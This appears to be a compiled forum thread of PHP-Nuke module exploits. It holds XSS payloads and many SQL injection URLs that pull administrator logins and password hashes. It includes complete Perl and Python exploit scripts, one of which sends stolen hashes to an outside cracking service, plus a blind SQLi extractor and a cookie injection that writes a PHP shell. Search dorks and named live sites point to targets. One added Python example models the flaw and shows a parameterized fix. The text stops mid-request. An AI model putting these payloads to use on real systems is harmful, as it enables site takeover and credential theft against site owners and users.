XSS in PHP-Nuke (eWeather module)

XSS
Vulnerable: eWeather module
Vulnerable code: in the script /modules/eWeather/index.php
PHP:
Line 35:
```php
$zipCode=$chart;
```
Line 47:
```php
echo "<div align =\"center\"><h2>USA weather for zip code $zipCode</h2>";
```
The variable "chart" is not filtered.
PoC:
Code:
```
http://example.net/modules.php?name=eWeather&chart=[XSS]
```
Fix: replace line 35 with:
```php
$zipCode=(int)$chart;
```
by: NetJackal
PHP-Nuke Platinum 7.6.b.5 (dynamic_titles.php) SQL Injection

SQL Injection
Vulnerable: PHP-Nuke Platinum 7.6.b.5
Vuln script: dynamic_titles.php
Exploit:
Code:
```perl
#!/usr/bin/perl
#Inphex
use LWP::UserAgent;
use LWP::Simple;
use IO::Socket;
use Switch;
#PHP-Nuke Platinum , Forums(Standart) - magic_quotes_gpc = OFF , SQL Injection
#nuke_users Structure:
#user_id name username user_email femail user_website user_avatar user_regdate user_icq user_occ user_from user_interests user_sig user_viewemail user_theme user_aim user_yim user_msnm user_password storynum umode uorder thold noscore bio ublockon ublock theme commentmax counter newsletter user_posts user_attachsig user_rank user_level broadcast popmeson user_active user_session_time user_session_page user_lastvisit user_timezone user_style user_lang user_dateformatuser_new_privmsg user_unread_privmsg user_last_privmsg user_emailtime user_allowhtml user_allowbbcode user_allowsmile user_allowavatar user_allow_pm user_allow_viewonline user_notify user_notify_pm user_popup_pm user_avatar_type user_sig_bbcode_uid user_actkey user_newpasswd last_ip user_color_gc user_color_gi user_quickreply user_allow_arcadepm kick_ban user_wordwrap agreedtos user_view_log user_effects user_privs user_custitle user_specmsg user_items user_trade points user_cash last_seen_blocker user_login_tries user_last_login_try user_gender user_birthday user_next_birthday_greeting
#Description:
#The file includes/dynamic_titles.php is vulnerable to SQL Injection - lines: 44 - 427
#What about PHP-Nukes' SQL Injection Protection?
#I could bypass its SQL Injection protection.
#If the file maintenance/index.php is on the server you can see if magic_quotes_gpc are turned off.
#You can of course edit the SQL Injection , file write is possible.
#
#Note: PHP-Nuke Platinum is very buggy,there are more bugs for sure(e.g. includes/nsbypass.php)

print "usage $0 -h localhost -p / -t nuke_users -c username -id 2\n\n";
$column = "username";
$table  = "nuke_users";
$uid    = 2;
%cm_n_ = ("-h" => "host", "-p" => "path", "-c" => "column", "-t" => "table", "-id" => "uid");
$a = 0;
foreach (@ARGV) {
    $a++;
    while (($k, $v) = each(%cm_n_)) {
        if ($_ eq $k) {
            ${$v} = $ARGV[$a];
        }
    }
}
&getit("http://" . $host . $path . "modules.php?name=Forums&p=-1'union+select-1," . $column . "+from+" . $table . "+where+user_id='" . $uid . "", "<title>(.*?)<\/title>");

sub getit($$) {
    $url = shift;
    $reg = shift;
    $ua = LWP::UserAgent->new;
    $urls = $url;
    $response = $ua->get($urls);
    $content = $response->content;
    if ($content =~ m/$reg/) {
        ($f, $s, $l) = split(">>", $1);
        $s =~ s/ Post //;
        print $column . ":" . $s . "\n";
    }
}
```
© Inphex
PHP-Nuke version 8.1 CAPTCHA bypass Tool that demonstrates how the CAPTCHA used in PHP-Nuke version 8.1 can be deciphered with 100% accuracy. http://packetstormsecurity.org/0804-exploits/php_nuke_captcha.zip
PHP-Nuke Module EasyContent (page_id) SQL Injection Vulnerability

Code:
```
-------------------------------------------------------------------------------
php-nuke modules EasyContent remote sql inj
-------------------------------------------------------------------------------
found =xoron
-------------------------------------------------------------------------------
modules.php?op=modload&name=EasyContent&file=index&menu=410&page_id=-1/**/union/**/select/**/0,aid/**/from/**/nuke_authors/**/where/**/radminsuper=1/*
modules.php?op=modload&name=EasyContent&file=index&menu=410&page_id=-1/**/union/**/select/**/0,pwd/**/from/**/nuke_authors/**/where/**/radminsuper=1/*
-------------------------------------------------------------------------------
Example: http://eurowards.org/content/
note: password and username in title! column number 1
note 2: Find a proper bug and then hang around; when asked, however many empty bugs there are get posted to milw0rm like this. If you want to see how a useful bug gets hits: http://www.milw0rm.com/author/721, just one bug, 16000+ hits, only on milw0rm ;) The king is always me!
-------------------------------------------------------------------------------
```
PHP-Nuke Gaestebuch SQL Injection Exploit

Code:
```python
#!/usr/bin/python
# PHP-Nuke Gaestebuch Module SQL Injection Exploit
# Coded By Shahin Ramezany For Fun
# E-Mail : [email protected]
import string
import urllib
import sys
import re

def Secuiran():
    print "\n"
    print "#####################################################"
    print "#                 WwW.Secuiran.Com                  #"
    print "# PHP-Nuke Gaestebuch Module SQL Injection Exploit  #"
    print "# Coded By Shahin . Ramezany (Vampire) For Fun      #"
    print "# Keep It Priv8 && Never Post In Public Forum's     #"
    print "# E-Mail : [email protected]                        #"
    print "# Gr33tz To : Syst3m_F4ult ,Shinobi ,Samir ,Xtemix  #"
    print "# Digilas ,Skuk ,Raptor &All Of Secuiran Member's   #"
    print "#####################################################"
    print "\n"

#Call Banner
Secuiran()
print "\n[+] Target Host: e.g: http://127.0.0.1/phpnuke/"
try:
    host=raw_input("\nTarget Host (with http) : ")
except KeyboardInterrupt:
    print "\n[-] Program Terminated"
    sys.exit()
print "\n[+] Output File: e.e: secuiran.txt"
try:
    secuiran=raw_input("\nOutput File: ")
except KeyboardInterrupt:
    print "\n[-] Program Terminated"
    sys.exit()
print "\n[+] Trying To Connect ...\n"
#SQL Injection URL
sql_inject=host+"/modules.php?name=gaestebuch_v22&func=edit&id=-1+union+all+select+1,1,1,aid,pwd+from+nuke_authors+where+radminsuper=1"
response = urllib.urlopen(sql_inject).read()
print "[+] Trying To Inject Code ...\n"
#Extract Admin User
findall_users=re.compile('<td><input type="text" name="guestemail" size="20" maxlength="50" value="(\w+)"></td>').findall
found_users=findall_users(response)
#check found user length
if len(found_users)==0:
    print "[-] Exploit Failed, Maybe Your Target Is Not Vulnerable "
    sys.exit()
#Extract Admin Hash
response = urllib.urlopen(sql_inject).read()
findall_hashs=re.compile('<textarea cols="50" rows="20" name="guesttext">(\w+)</textarea>').findall
found_hashs=findall_hashs(response)
if len(found_hashs)==0:
    print "[-] Exploit Failed, Maybe Your Target Is Not Vulnerable "
    sys.exit()
#Crack The Hash
md5 = string.join( found_hashs, '' )
print "[+] Trying To Crack The Hash ..."
crack="http://tmto.org/server/proxy.php?action=search&div=result&host=MD5_1&arg="+md5
result = urllib.urlopen(crack).read()
cracked = re.compile("MD5_1_result,"+md5+" - (\w+)").findall
if re.match(result,"MD5_1_result,"+md5+" - not found"):
    print "[-] Can Not Crack"
    #sys.exit()
found=cracked(result)
#Convert List To String
cracked_md5 = string.join( found, '' )
#Print All Info
Secuiran()
print "\n[+] Host : ",host
for i in range(len(found_users)):
    print "\n[+] Admin User : ",found_users[i]
    print "\n[+] Admin Hash : ",found_hashs[i]
if (cracked_md5 == "not"):
    print "\n[-] Sorry Can Not Crack Your Hash Go And Try More !!!"
else:
    print "\n[+] Hash Cracked Successfully : ",cracked_md5
#Save All Info In File
file = open(secuiran, "w")
file.write("**************************************************WwW.Secuiran.Com**************************************************\n")
file.write("\n")
file.write("HOST :")
file.write(" ")
file.write(host)
file.write("\n")
file.write("\n")
file.write("USER HASH\n")
file.write(" ")
file.write("\n")
for i in range(len(found_users)):
    file.write(found_users[i])
    file.write(" ")
    file.write(found_hashs[i])
    file.write("\n")
file.write("\n")
if (cracked_md5 == "not"):
    file.write("\n")
    file.write("I Can't Crack Your Hash")
else:
    file.write("Cracked :")
    file.write(" ")
    file.write("\n")
    file.write(cracked_md5)
    file.write("\n")
file.write("**************************************************WwW.Secuiran.Com**************************************************\n")
file.close()
print "\n[+] Successfully, Writed To ",secuiran," File ."
```
PHPNuke <= 8.0 And maybe Higher Blind Sql Injection Vulnerability

Code:
```python
#!/usr/bin/python
#=================================================================================================#
# This is a Priv8 Exploit.                                                                        #
# Date: 23/02/2008 [dd,mm,yyyy]                                                                   #
#=================================================================================================#
# PHPNuke <= 8.0 And maybe Higher Blind Sql Injection Vulnerability #2                            #
# Response Analisys Method                                                                        #
#                                                                                                 #
# Vendor: http://www.phpnuke.org                                                                  #
# Severity: Highest                                                                               #
# Author: The:Paradox                                                                             #
#=================================================================================================#
# Server configuration requirments:                                                               #
# magic_quotes_gpc = 0                                                                            #
#=================================================================================================#
# Proud To Be Italian.                                                                            #
#=================================================================================================#
"""
Related Codes:

mainfile.php; line 89;
if (!ini_get('register_globals')) {
    @import_request_variables("GPC", "");
}

/Your_Account/index.php; line 1700;
switch($op) {
    // [..]
    case "activate":
        activate($username, $check_num);
        break;
    // [..]
}

/Your_Account/index.php; line 161:
function activate($username, $check_num) {
    global $db, $user_prefix, $module_name, $language, $prefix;
    $username = filter($username, "nohtml", 1);
    $past = time()-86400;
    $db->sql_query("DELETE FROM ".$user_prefix."_users_temp WHERE time < $past");
    $sql = "SELECT * FROM ".$user_prefix."_users_temp WHERE username='$username' AND check_num='$check_num'";
    echo $sql;
    $result = $db->sql_query($sql);
"""
#=================================================================================================#
# Proof Of Concept / Bug Explanation:                                                             #
#                                                                                                 #
# I'm too lazy to write explanation this time. Sql injection Mq=OFF in $check_num variable.       #
# Byte null bypasses all query string check.                                                      #
#=================================================================================================#
# Google Dork=> Powered by PHPNuke                                                                #
#=================================================================================================#
# Use this at your own risk. You are responsible for your own deeds.                              #
#=================================================================================================#
# Python Exploit Starts                                                                           #
#=================================================================================================#
import httplib, sys, time

print "\n#=========================================================#"
print "   PHPNuke <= 8.0 And Maybe Higher                         "
print "   Blind Sql Injection Vulnerability Mq=0                  "
print "   Response Analisys Method                                "
print "                                                           "
print "   Discovered By The:Paradox                               "
print "                                                           "
print "   Usage:                                                  "
print "   python %s [Target] [Path] [UsernameUnveryfied]          " % (sys.argv[0])
print "                                                           "
print "   Example:                                                "
print "   python %s 127.0.0.1 /Nuke/ Abdullah                     " % (sys.argv[0])
print "   python %s www.host.com / Andrea                         " % (sys.argv[0])
print "                                                           "
print "                                                           "
print "#=========================================================#\n"

if len(sys.argv)<=3:
    sys.exit()
else:
    print "[.]Exploit Starting."

target = sys.argv[1]
path = sys.argv[2]
prefix = "nuke_"
port = "80"
j=1
h4sh = ""
md5tuple = []
for k in range(48,58):
    md5tuple.append(k)   # 48->57 and 97->102
for k in range(97,103):
    md5tuple.append(k)
md5tuple.append('END')
# Result query >>>
#
# SELECT * FROM nuke_users_temp WHERE username='Nick' AND check_num='1%00' OR (SELECT IF((ASCII(SUBSTRING(pwd,1,1))=99),1,null) FROM nuke_authors WHERE radminsuper=1)='1'
#
print "[.]Blind Sql Injection Starts.\n\nHash:"
while j <= 32:
    for i in md5tuple:
        if i == 'END':
            sys.exit('[-]Exploit Failed.\n')
        conn = httplib.HTTPConnection(target,port)
        conn.request('GET', path + "modules.php?name=Your_Account&op=activate&username=" + sys.argv[3] + "&check_num=1%00'+OR+(SELECT+IF((ASCII(SUBSTRING(pwd," + str(j) + ",1))=" + str(i) + "),1,null)+FROM+" + prefix + "authors+WHERE+radminsuper=1)='1", {}, {"Accept": "text/plain", "lang":"english"})
        response = conn.getresponse()
        time.sleep(0.5)
        if response.status == 404:
            sys.exit('[-]Error 404. Not Found.')
        if response.read().find("New user verification number is invalid.") != -1:
            sys.stdout.write(chr(i))
            sys.stdout.flush()
            h4sh += chr(i)
            j += 1
            break;
print "\n\n[+]All Done.\n-=Paradoxe=-"
```
I poked at PHP Nuke 8.0 a while ago. Here are a couple of bugs:
[XSS] http://nuke/modules.php?name=Encyclopedia&file=search&eid=1%00"><script>alert()</script>
[XSS] http://nuke/modules.php?name=Your_Account&op=logout
POST: redirect=1%00"><script>alert()</script>
[SQL-Inj] (POC) http://nuke/admin.php
POST: aid=d%00'%0DUNION SELECT md5(1),'&pwd=1&random_num=80237&op=login
Vulnerable version: myPHPNuke 1.8.8_8rc2
XSS vulnerability in site.ru/memberslist.php in the parameters search, letter, sortcol, sortdir, pagesize.
Everything there is in Ukrainian; I understood little about regenat there.
XSS: POST request on the page http://site/modules.php?name=Your_Account&op=new_user
Code:
```
"><script src=http://site/script.js>
```
In the fields: gfx_check and random_num.
I poked at PHP Nuke 8.0 and found an SQLi; it doesn't seem to be a known one.
The gist of the bug is that in the News module, in comments, the email data fetched from the DB is not filtered by nuke and is substituted into a query, which lets us inject our sql code.
Exploit:
As an example I'll take the site sat-port.info.
Register, then edit our account:
Code:
```
http://sat-port.info/modules.php?name=Your_Account&op=edituser
```
In the "Any Email" field write:
Code:
```
[email protected]',1,2,(select concat_ws(0x3a,aid,pwd) from nuke_authors limit 0,1),4,5,6,7)/*
```
Take any news item where comments are allowed, for example this one:
Code:
```
http://sat-port.info/modules.php?name=News&file=article&sid=554
```
Click "Comment" and write a comment with any content; as a result a comment appears containing the administrator's login:hash.
myPHPNuke < 1.8.8_8rc2 (artid) SQL Injection Vulnerability

Code:
```
############################################################
SQL Injection vulnerability in myPHPNuke

By MustLive (http://websecurity.com.ua)
Detailed information: http://websecurity.com.ua/2398/

Description:
There is SQL Injection vulnerability in printfeature.php in myPHPNuke.

SQL Injection:
http://site/printfeature.php?artid=-1%20union%20select%20null,null,aid,pwd,null,null,null,null%20from%20mpn_authors%20limit%200,1

With this query you will receive login and password (hash) of administrator.

Vulnerable versions are myPHPNuke < 1.8.8_8rc2. In the last version additional filters were added, so it is not vulnerable to this attack. But version 1.8.8_8rc2 is still vulnerable to SQL Injection, so a limited SQL Injection attack is possible (without using spaces and brackets).
############################################################
# milw0rm.com [2008-09-02]
```
Ripped from milw0rm.com/exploits/6347
I studied the Mediacatalog v3.1 module in PHP Nuke 8.0
Code:
```
modules.php?name=Mediacatalog&pa=list_pag&cid=-1+union%0Aselect+aid,pwd+from+nuke_authors
```
and also
Code:
```
modules.php?name=Mediacatalog&pa=Listcat&cidcat=-1+union%0Aselect+1,2,aid,3,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,pwd,24,25+from+nuke_authors--
modules.php?name=Mediacatalog&pa=Newsreliz&catnewid=-1+union%0Aselect+1,2,3,4,5,6,7,8,9,10,11,12,pwd,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,aid,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49+from+nuke_authors--
```
SQL-Injection PHP-Nuke <= 8.0

SQL-Injection In PHP-Nuke <= 8.0 (Module Reviews)
/modules/Reviews/index.php
Fragment of the vulnerable code:
PHP:
```php
$uname = filter($cookie[1], "nohtml");
$id = intval($id);
$score = intval($score);
if (is_user($user)) {
    $krow = $db->sql_fetchrow($db->sql_query("SELECT karma FROM ".$user_prefix."_users WHERE username='$uname'"));
    if ($krow['karma'] == 2) {
        $db->sql_query("insert into ".$prefix."_reviews_comments_moderated values (NULL, '$id', '$uname', now(), '$comments', '$score')");
        include("header.php");
        title(""._MODERATEDTITLE."");
        OpenTable();
        echo "<center>"._COMMENTMODERATED."";
        echo "<br><br><a href=\"modules.php?name=$module_name&rop=showcontent&id=$id\">"._MODERATEDTITLE."</a>";
        CloseTable();
        include("footer.php");
        die();
    } elseif ($krow['karma'] == 3) {
        Header("Location: modules.php?name=$module_name&rop=showcontent&id=$id");
        die();
    }
}
$db->sql_query("insert into ".$prefix."_reviews_comments values (NULL, '$id', '$uname', now(), '$comments', '$score')");
```
There are 2 sql-inj here at once, in the select and in the insert queries. After the cookie is decoded the data is slashed, but in this code fragment the data from $cookie[1] goes into the filter function:
PHP:
```php
function filter($what, $strip="", $save="", $type="") {
    if ($strip == "nohtml") {
        $what = check_html($what, $strip);
        // $what = htmlentities(trim($what), ENT_QUOTES);
        // If the variable $what doesn't comes from a preview screen should be converted
        if ($type != "preview" AND $save != 1) {
            $what = html_entity_decode($what, ENT_QUOTES);
        }
    }
    if ($save == 1) {
        $what = check_words($what);
        $what = check_html($what, $strip);
        if (!get_magic_quotes_gpc()) {
            $what = addslashes($what);
        }
    } else {
        $what = stripslashes(FixQuotes($what,$strip));
        $what = check_words($what);
        $what = check_html($what, $strip);
    }
    return($what);
}
```
and from there into the check_html function:
PHP:
```php
function check_html ($str, $strip="") {
    /* The core of this code has been lifted from phpslash */
    /* which is licenced under the GPL. */
    include("config.php");
    if ($strip == "nohtml")
        $AllowableHTML=array('');
    $str = stripslashes($str);
    $str = eregi_replace("<[[:space:]]*([^>]*)[[:space:]]*>",'<\\1>', $str);
    // Delete all spaces from html tags .
    $str = eregi_replace("<a[^>]*href[[:space:]]*=[[:space:]]*\"?[[:space:]]*([^\" >]*)[[:space:]]*\"?[^>]*>",'<a href="\\1">', $str);
    // Delete all attribs from Anchor, except an href, double quoted.
    $str = eregi_replace("<[[:space:]]* img[[:space:]]*([^>]*)[[:space:]]*>", '', $str);
    // Delete all img tags
    $str = eregi_replace("<a[^>]*href[[:space:]]*=[[:space:]]*\"?javascript[[:punct:]]*\"?[^>]*>", '', $str);
    // Delete javascript code from a href tags -- Zhen-Xjell @ http://nukecops.com
    $tmp = "";
    while (ereg("<(/?[[:alpha:]]*)[[:space:]]*([^>]*)>",$str,$reg)) {
        $i = strpos($str,$reg[0]);
        $l = strlen($reg[0]);
        if ($reg[1][0] == "/") $tag = strtolower(substr($reg[1],1));
        else $tag = strtolower($reg[1]);
        if ($a = $AllowableHTML[$tag])
            if ($reg[1][0] == "/") $tag = "</$tag>";
            elseif (($a == 1) || ($reg[2] == "")) $tag = "<$tag>";
            else {
                # Place here the double quote fix function.
                $attrb_list=delQuotes($reg[2]);
                // A VER
                //$attrb_list = ereg_replace("&","&",$attrb_list);
                $tag = "<$tag" . $attrb_list . ">";
            } # Attribs in tag allowed
        else $tag = "";
        $tmp .= substr($str,0,$i) . $tag;
        $str = substr($str,$i+$l);
    }
    $str = $tmp . $str;
    return $str;
    exit;
    /* Squash PHP tags unconditionally */
    $str = ereg_replace("<\?","",$str);
    return $str;
}
```
where the escaping backslashes are successfully removed, so it becomes possible to inject our sql code. Through the sqli in the select the data cannot be output, so we use the sqli in the insert. Go to /modules.php?name=Reviews&rop=showcontent&id=1, choose any review, click "Post comment", and put in the cookie:
Code:
```
base64_encode(yourid:yournick',1,(select concat(aid,0x3a,pwd) from nuke_authors),3)/*:yourhash:10:thread:1:0:0:0:RusNuke2003:4096)
```
Click submit; as a result we get the admin's login:hash.
On the other hand, through the sqli in the select, given file_priv, a shell can be uploaded; put in the cookie:
Code:
```
base64_encode(yourid:yournick' union select 0x3c3f20706870696e666f28293b203f3e into outfile '/tmp/theme.php'/*:yourhash:10:thread:1:0:0:0:RusNuke2003:4096)
```
Here the path doesn't need to be disclosed: write to tmp, then simply include the uploaded shell via the templates. To do this go to /modules.php?name=Your_Account&op=chgtheme, edit the source where the theme name is written (in my case value=RusNuke2003) and write:
Code:
```
<option value="/../../../../../../../tmp/" >RusNuke2003
```
Save, get a shell.
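The filter()/check_html() chain quoted in this post removes the backslashes that magic_quotes_gpc added, so the cookie value reaches the query with its quotes intact. The following is an added example, not PHP-Nuke code: it re-implements addslashes() and stripslashes() in Python, models the three stripslashes() passes the quoted filter("nohtml") path performs (tag stripping and check_words() are omitted), builds the SELECT karma query by concatenation as the module does, and runs it against an in-memory SQLite table standing in for nuke_users, once concatenated and once with a bound parameter, which is the change that makes the slash handling irrelevant to the query.

```python
"""Model of the escaping defect in /modules/Reviews/index.php as quoted above.

Added example, not PHP-Nuke code. Only the parts of filter()/check_html() that
touch backslashes are modelled; tag stripping and check_words() are omitted.
"""
import sqlite3


def addslashes(s: str) -> str:
    """PHP addslashes(), which magic_quotes_gpc applies to request data."""
    return (s.replace("\\", "\\\\").replace("'", "\\'")
             .replace('"', '\\"').replace("\x00", "\\0"))


def stripslashes(s: str) -> str:
    """PHP stripslashes(): remove one level of backslash escaping."""
    out, i = [], 0
    while i < len(s):
        if s[i] == "\\" and i + 1 < len(s):
            out.append("\x00" if s[i + 1] == "0" else s[i + 1])
            i += 2
        else:
            out.append(s[i])
            i += 1
    return "".join(out)


def nuke_filter_nohtml(what: str) -> str:
    """filter($what, "nohtml") as quoted: three call sites strip slashes."""
    what = stripslashes(what)   # check_html(): $str = stripslashes($str);
    what = stripslashes(what)   # filter(): $what = stripslashes(FixQuotes($what, $strip));
    what = stripslashes(what)   # filter(): second check_html() call
    return what


def build_select(cookie_username: str, magic_quotes_gpc: bool = True) -> str:
    """The SELECT karma query, built by concatenation like the quoted module."""
    uname = addslashes(cookie_username) if magic_quotes_gpc else cookie_username
    uname = nuke_filter_nohtml(uname)
    return f"SELECT karma FROM nuke_users WHERE username='{uname}'"


def demo_db() -> sqlite3.Connection:
    """In-memory stand-in for the nuke_users table (constructed sample rows)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE nuke_users (username TEXT, karma INTEGER)")
    conn.executemany("INSERT INTO nuke_users VALUES (?, ?)",
                     [("alice", 1), ("O'Brien", 2)])
    return conn


def karma_concatenated(conn: sqlite3.Connection, cookie_username: str) -> str:
    """Run the concatenated query; a quote in the name breaks the statement."""
    try:
        rows = conn.execute(build_select(cookie_username)).fetchall()
        return f"ok: {rows}"
    except sqlite3.OperationalError as exc:
        return f"sql error: {exc}"


def karma_parameterized(conn: sqlite3.Connection, cookie_username: str) -> list:
    """Same lookup with a bound parameter: the value never becomes SQL syntax."""
    return conn.execute("SELECT karma FROM nuke_users WHERE username=?",
                        (cookie_username,)).fetchall()


if __name__ == "__main__":
    conn = demo_db()
    for name in ("alice", "O'Brien"):
        print(repr(build_select(name)))
        print("  concatenated :", karma_concatenated(conn, name))
        print("  parameterized:", karma_parameterized(conn, name))
```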
PHP-NUKE module vulnerabilities

Vulnerable product: PHP-NUKE module Pages
Version: 1.0
Dork: Pages © inurl:/modules.php?name=Pages
SQL injections
Vulnerability in file: index.php
The module has no protection against sql-inj whatsoever, so I see no point in quoting fragments of the vulnerable code; all parameters are vulnerable.
Code:
```
/modules.php?name=Pages&pa=list_pag&cid=-2%0aunion+select+aid,pwd+from+nuke_authors%23
/modules.php?name=Pages&pa=showpage&pid=11'%0aunion+select+1,2,aid,pwd,5,6,7,8,9,0,11,12+from+nuke_authors%23
/modules.php?name=Pages&pa=list_pages_categories&cid=11'%0aunion+select+1,aid,pwd,4+from+nuke_authors%23
/modules.php?name=Pages&cid=11'%0aunion+select+1%23
/modules.php?name=Pages&pid=11'%0aunion+select%201,2%23
```
Vulnerable product: PHP-NUKE module video stream
Version: 4.53
Dork: inurl:name=Video_Stream
SQL injections
Vulnerability in file: watch.php
PHP:
```php
$id = $_GET['id'];
$request = $_GET['request'];
if($id == "request") {
    // Gets the data of request video **FOR ADMIN**
    $result = $db->sql_query("SELECT * FROM ".$prefix."_video_stream WHERE id='$request'");
    $row = $db->sql_fetchrow($result);
} else {
    // Check if category is adult category and requires user to accept disclaimer or if required ofr the user to be registered
    adultcategory($id);
    // Add user point for veiwing video
    userpointsVS(1);
    // adds a view to the video
    $result = $db->sql_query("SELECT * FROM ".$prefix."_video_stream WHERE id='$id'");
    $row = $db->sql_fetchrow($result);
    $v = $row['views'];
    $v++;
    $result = $db->sql_query("UPDATE ".$prefix."_video_stream SET views='$v' WHERE id='$id'");
    // Gets the data of that video
    $result = $db->sql_query("SELECT * FROM ".$prefix."_video_stream WHERE id='$id'");
    $row = $db->sql_fetchrow($result);
}
```
As we can see, several sql-inj are present here at once.
Example requests:
Code:
```
/modules.php?name=Video_Stream&page=watch&id=11'%0aunion+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16%23
/modules.php?name=Video_Stream&page=watch&id=request&request=11'%0aunion+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16%23
```
Vulnerability in file: broken.php
PHP:
```php
if($_POST['Submit']) {
    OpenTable();
    $usernameb = $_POST['username'];
    $user_emailb = $_POST['user_email'];
    $result = $db->sql_query("INSERT INTO ".$prefix."_video_stream_broken (username, email, brokenvidid) VALUES('$usernameb', '$user_emailb', '$id') ");
```
Example request:
Code:
```
POST /phpnuke/modules.php?name=Video_Stream&page=broken&id=1 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.1.11) Gecko/20071127
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: ru-ru,ru;q=0.8,en-us;q=0.5,en;q=0.3
Keep-Alive: 300
Connection: keep-alive
Referer: http://localhost/phpnuke/modules.php?name=Video_Stream&page=broken&id=1&vidname=3
Content-Type: application/x-www-form-urlencoded
Content-Length: 90

username=',if(1=1,BENCHMARK(1559911,MD5(NOW())),1),1)/*&user_email=ad%40a.ru&Submit=Submit
```
Vulnerability in file: search.php
This module has several sql-inj at once.
Example requests:
1. /phpnuke/modules.php?name=Video_Stream&page=search, in the search field:
Code:
```
44' union/**/select 1,2,3,4,5,6,7,8,9,0,11,12,13,14,15,16/*
```
2.
Code:
```
POST /phpnuke/modules.php?name=Video_Stream&page=search HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.1.11) Gecko/20071127
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Keep-Alive: 300
Connection: keep-alive
Referer: http://localhost/phpnuke/modules.php?name=Video_Stream&page=search
Content-Type: application/x-www-form-urlencoded
Content-Length: 138

PHPSESSID=1960d2f98b8657b6e5bdf140c2f8c8ec&orderby=0&categoryby=31' union/**/select 1,2,3,4,5,6,7,8,9,0,11,12,13,14,15,16%23&sortvids=Sort
```
Vulnerability in file: comment.php
PHP:
```php
$commenttopost = $_POST['comment'];
// Check if no comment
if($commenttopost == "") {
    die(""._NOCOMMENTENT."");
}
$date = date("h:i A dS M Y");
$username = $looker;
// Strips out HTML and Censored Words
filter_text($commenttopost, 'nohtml');
// **********************************
userpointsVS(2);
$result = $db->sql_query("INSERT INTO ".$prefix."_video_stream_comments (vidid, user, date, comment) VALUES ('$id', '$username', '$date', '$EditedMessage') ");
```
Put in the cookie:
Code:
```
id=СУЩЕСТВУЮЩИЙ_ID', 'admin', '12:02 AM 15th Dec 2008',(select concat(aid,0x3a,pwd) from nuke_authors limit 0,1))/*
```
As a result we get a comment containing the administrator's aid:hash.
Vulnerable product: PHP-NUKE module auktion
Version: 2.0
Dork: inurl:modules.php?name=auktion
SQL injections
The module has no protection against sql-inj whatsoever; vulnerabilities are present in almost every file.
Example requests:
Code:
```
/modules.php?name=auktion&file=viewitem&item=4%0aunion+select+1,2,3,4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19,20,21
/modules.php?name=auktion&file=catlist&catid=29'%0aunion+select+1,2,3,4,5,6,7%23
/modules.php?name=auktion&file=searchit&query='%0aunion+select+1,2,3,4,5,6,7/*
/modules.php?name=auktion&file=edititem&item=-3'%0aunion+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21%23
```
Code:
```
POST /modules.php?name=auktion&file=edititem HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.1.11) Gecko/20071127
Keep-Alive: 300
Connection: keep-alive
Referer: http://localhost/nuke81/modules.php?name=auktion&file=edititem&item=3
Cookie: lang=english; admin=YWRtaW46OTZlNzkyMTg5NjVlYjcyYzkyYTU0OWRkNWEzMzAxMTI6; user=MjphZG1pbjo5NmU3OTIxODk2NWViNzJjOTJhNTQ5ZGQ1YTMzMDExMjoxMDo6MDowOjA6MDo6NDA5Ng%3D%3D;
Content-Type: application/x-www-form-urlencoded
Content-Length: 105

name=auktion&file=update&item=3&desc=4',title=(select concat(aid,0x3a,pwd) from nuke_authors limit 0,1)/*
```
Vulnerable product: PHP-NUKE module NukeJokes
Version: 2.2
Dork: inurl:modules.php?name=NukeJokes
SQL injections
Vulnerability in file: index.php
PHP:
```php
function CatView($cat, $page){
    ...
    $result = sql_query("SELECT jokecid, catname FROM ".$prefix."_jokes_categories WHERE jokecid='$cat'", $dbi);
```
Data from the cat parameter goes into the query without any transformation.
Example request:
Code:
```
/modules.php?name=NukeJokes&func=CatView&cat=-7'%0aunion+select+1,2%23
```
PHP:
```php
function JokeView($jokeid){
    ...
    $result = sql_query("SELECT author, name, date, cat, joke, hits, ratingtot, ratings FROM ".$prefix."_jokes WHERE jokeid='$jokeid'", $dbi);
```
Data from the jokeid parameter goes into the query without any transformation.
Example request:
Code:
```
/modules.php?name=NukeJokes&func=JokeView&jokeid=-1'%0aunion+select+1,2,3,4,5,6,7,8%23
```
Vulnerability in file: send.php
PHP:
```php
function send($jokeid, $sendername, $senderemail, $toname, $toemail){
    global $sitename, $nukeurl, $prefix, $dbi, $module_name, $stop;
    include("header.php");
    include("config.php");
    checkemail($toemail);
    if (!$stop) {
        $result = sql_query("SELECT name from ".$prefix."_jokes where jokeid='$jokeid'", $dbi);
        list($name) = sql_fetch_row($result, $dbi);
        $subject = ""._SUBJECT." $sitename";
        $message = ""._HELLO." $toname:\n\n"._YOURFRIEND." $sendername "._CONSIDERED."\n\n\n$name\n\n"._URL.": $nukeurl/modules.php?name=$module_name&func=JokeView&jokeid=$jokeid\n\n"._YOUCANREAD." $sitename\n$nukeurl";
        $toemail = str_replace(" ","",$toemail);
        mail($toemail, $subject, $message, "From: \"$sendername\" <$senderemail>\nX-Mailer: PHP/" . phpversion());
```
The vulnerability is in the jokeid parameter: since the data from the name column is sent by email, with this request:
Code:
```
POST /modules.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.1.11) Gecko/20071127
Keep-Alive: 300
Connection: keep-alive
Referer: http://localhost/modules.php?name=NukeJokes&file=send&jokeid=1608
Cookie: TRACKID=7b45bd0b2a560da542a5eb4fc22512c6; lang=english
Content-Type: application/x-www-form-urlencoded
Content-Length: 181

